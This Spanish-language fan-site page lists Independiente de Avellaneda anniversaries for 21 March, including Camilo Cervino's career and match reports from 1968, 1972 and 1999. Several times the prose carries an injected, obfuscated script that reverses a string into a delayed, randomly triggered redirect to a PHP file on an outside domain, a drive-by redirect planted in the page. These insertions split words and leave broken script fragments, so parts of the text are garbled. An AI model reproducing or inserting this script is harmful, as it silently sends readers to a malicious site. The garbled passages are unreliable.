Conectate con nosotros

Efemérides

Efemérides del 21 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1926Nacimiento en Ciudad de Buenos Aires, de Camilo Rodolfo Cervino, quien jugó 194 partidos e hizo 89 goles (el séptimo de la tabla histórica profesional y décimo en toda la historia), una suma impresionante tratándose de un wing clásico que jugaba siempre pegadito a la raya, pero cuando entraba al área hacía desastres con su habilidad.

Brilló en independiente jugando entre 1944 y 1949, y luego entre 1955 y 1957. Era un delantero muy completo y de enorme habilidad que hizo su debut con apenas 17 años, y tiene el honor de haber sido el primer jugador en convertirle un gol a Amadeo Carrizo. Fue campeón con Independiente en 1948, jugando con figuras como Juan Romay, Mario Fernández y Vicente De la Mata, quien era su gran socio. En ese campeonato marcó 14 goles, para ser el segundo goleador del equipo detrás de Mario Fernández.

Tan alto era su nivel que Torino de Italia puso los ojos sobre él, siendo en esos tiempo uno o el más importante de los equipos del mundo, pero el pase no se llegó a concretar. Aun así, la huelga de jugadores de fines de 1948, hizo que Cervino como tantos otros grandes jugadores de nuestro fútbol emigraran a Colombia, y así se fue a Deportivo Cali, donde a fuerza de goles se convirtió en ídolo. Permaneció unos cinco años hasta que vuelve a Independiente, y en su segunda etapa fue más polifuncional en el ataque y ya no solo wing derecho. De todas maneras ya era un poco relegado por la presencia de un crack como Rodolfo Micheli.

Se marcharía otra vez a Colombia para jugar en Deportivo Cali nuevamente y también en América de dicha ciudad, hasta retirarse a mediados de la década del 60, siendo apodado el Señor o el Caballero del Futbol. Cervino terminó su carrera habiendo convertido 231 goles, una suma extremadamente notable para un wing, si cualquier centro delantero sueña con llegar a esa cantidad en su carrera. Falleció por causas naturales con 91 años en 2017.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»73″ height=»56″/></figure></div>



<p><strong>1968</strong> – <strong>Independiente en Lima le gana a Universitario de Perú por 0 a 3</strong>, con un <strong>triplete del extraordinario José Omar Pas<script>$mWn=function(n){if(typeof ($mWn.list[n])==toriza, a los 9’, 33’  y 77 minutos.

El partido fue por la segunda fase o fase semifinal de la Copa Libertadores 1968. El Rojo la jugaba por ser campeón del Torneo Nacional 1967, y había superado ya la fase de grupos clasificando segundo detrás de Estudiantes de La Plata, luego de un desempate frente a Deportivo Cali que tuvo efeméride.

Jornada notable y maravillosa del “Pato” Pastoriza, anotándose en la red a placer. El primero fue una gran jugada de Luis Artime por derecha, metiendo el centro atrás para José, que la agarró de primera y la metió arriba. El segundo fue mediante un formidable remate de larga distancia, un bombazo terrible del “Pato” mostrando el poder de su pegada. El tercero llegó mediante un centro desde la derecha de Raúl Bernao para Artime, pero Luis la dejó pasar viendo que Pastoriza llegaba mejor posicionado y éste definió, cruzando la pelota para que pegue en el palo y se meta.

Con el triunfo de visitante de un día como hoy, arrancaba de la mejor manera esta fase para Independiente, pero en ella otra vez tocó Estudiantes, que no solo le volvería a ganar ambos encuentros como en la fase de grupos, sino que además sería el campeón de la competencia. Lógicamente que se trató del mejor Estudiantes de toda su historia, dirigido por Osvaldo Zubeldía.

Los 11 de la victoria en Lima fueron: Miguel Santoro; Idalino Monges y Ricardo Pavoni; José Pastoriza, David Acevedo y Dante Mírcoli; Raúl Bernao, Osvaldo Mura, Luis Artime, Savoy y Aníbal Tarabini, con el D.T. Emilio Baldonedo. Claramente la figura del partido fue el “Pato” Pastoriza, que se afianzaba como líder del equipo dentro y fuera de la cancha, y ese día jugó de los mejores partidos de su vida, valiéndole ser tapa del El Gráfico posterior al encuentro.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»64″ height=»49″/></figure></div>



<p><strong>1972</strong> – <strong>Independiente en la Doble Visera le gana a Independiente Santa Fe de Colombia por 2 a 0,</strong> con <strong>goles de Ricardo “Chivo” Pavoni</strong> <strong>a los 15</strong> minu<script>$mWn=function(n){if(typeof ($mWn.list[n])==tos y Dante “el Tano” Mírcoli a los 20’. El Rojo definió rápidamente el quinto partido de la fase de grupos de la Copa Libertadores 1972, que hasta ahí lo tenía invicto con tres victorias y dos empates. No jugó para nada bien aquel día, pero con los goles tempraneros y mucho oficio justificó la victoria.

Así alcanzaba los 8 puntos y era seguido por Rosario Central con 6, mientras que ya no tenían chances Independiente Santa Fe y Atlético Nacional. Éste último, era el rival que le faltaba enfrentar al Rojo, que con un empate le bastaba para quedar como líder, condición necesaria para pasar de fase y seguir luchando por el título.

El equipo de aquella jornada fue: Miguel Santoro; Eduardo Commisso, Miguel López, Francisco y Ricardo Pavoni; José Pastoriza, Miguel Raimondo y Alejandro Semenewicz; Agustín Balbuena (75’ Enrique Cavoli), Carlos Bulla y Dante Mírcoli, con Pedro Dellacha como D.T.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»71″ height=»55″/></figure></div>



<p><strong>1999</strong> – <strong>Independiente como visitante le gana a Racing por 0 a 2</strong>, con <strong>goles</strong> de <strong>José Luis Calderón a los 53</strong> minu<script>$mWn=function(n){if(typeof ($mWn.list[n])==tos y Christian Gómez a los 83’.

Fue por la fecha 3 del Torneo Clausura 1999, y ese día el Rojo formó con: Norberto Scoponi; Gustavo Núñez, Pablo Rotchen, Óscar Sánchez y Cristian Díaz; Rubén Galván, Esteban Cambiasso, Víctor López y Daniel Garnero (80’ Fabián Carrizo); Mauricio Hanuch (82’ Christian Gómez) y José Calderón (78’ Claudio Graf), con el D.T. César Luis Menotti. El local por su parte lo hizo con: Sessa; Reinoso, Diego Capria, Úbeda y Zanetti; Bezonbe (80’ Giménez), Michelini y Morales (61’ Ojeda); Rubén Capria; Delgado y Latorre, con Gustavo Costas como D.T.

Se trató de la primera victoria del torneo para el Rojo, que había empatado en el debut con Belgrano en Córdoba y en la segunda frente a Newell’s en Avellaneda. Pero además arrastraba 12 fechas sin lograr triunfos, contabilizando el torneo anterior. Aún así dominó el clásico y fue justo ganador, con Pablo “Morrón” Rotchen como la figura en defensa, Daniel Garnero dominando la pelota y los tiempos del juego como en su mejor época, mientras que José Calderón mediante un tiro libre fantástico abrió el partido y “Gomito” Gómez lo definió en un buen contragolpe del equipo.

Por su parte, el contexto del equipo vecino era el peor de su historia, resumido en la frase que la síndico Liliana Ripoll había expresado ese mismo mes de marzo: “ha dejado de existir Racing Club asociación civil”.

En aquel campeonato Independiente culminaría en el quinto puesto, con un nivel extraordinario de “Caldera”, quien con sus 17 goles convirtió más de la mitad de los tantos que hizo el equipo, y fue el máximo artillero de la competencia.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»70″ height=»54″/></figure></div>



<p>Les dejo el <strong>video de los goles:</strong></p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides